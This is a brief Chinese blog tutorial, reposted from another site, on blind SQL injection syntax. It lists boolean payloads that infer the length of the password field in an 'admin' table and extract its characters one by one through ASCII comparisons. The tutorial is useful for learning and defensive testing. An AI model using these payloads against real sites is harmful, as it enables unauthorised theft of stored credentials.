关于sql盲注语法


本文摘自PHP中文网,作者藏色散人,侵删。

如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容

获取数据长度:

1

2

3

and (select top 1 len(列名) from 表名)>5

and (select top 1 len(password) from admin)>16//错误

and (select top 1 len(password) from admin)>15//正常

获取指定位数的数据:

1

2

3

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97

and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常

and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

1

2

mid(字符串,截取的位置,截取字符数)

asc() //将字符转换成ascii码 方便进行比较

推荐:《mysql视频教程》

以上就是关于sql盲注语法的详细内容,更多文章请关注木庄网络博客

相关阅读 >>

mssql批量插入数据优化详细

sqlserver 手工实现差异备份的步骤

sql 优化的几种方法

mysql通透详解架构设计

sqlserver复制数据库的方法步骤(图文)

sql语句创建外键关联的完整实例

简述mysql explain 命令

sqlserver sql性能优化技巧

详解android数据存储之sqlcipher数据库加密

sql更新记录的命令是什么

更多相关阅读请进入《sql》频道 >>


数据库系统概念 第6版
书籍

数据库系统概念 第6版

机械工业出版社

本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...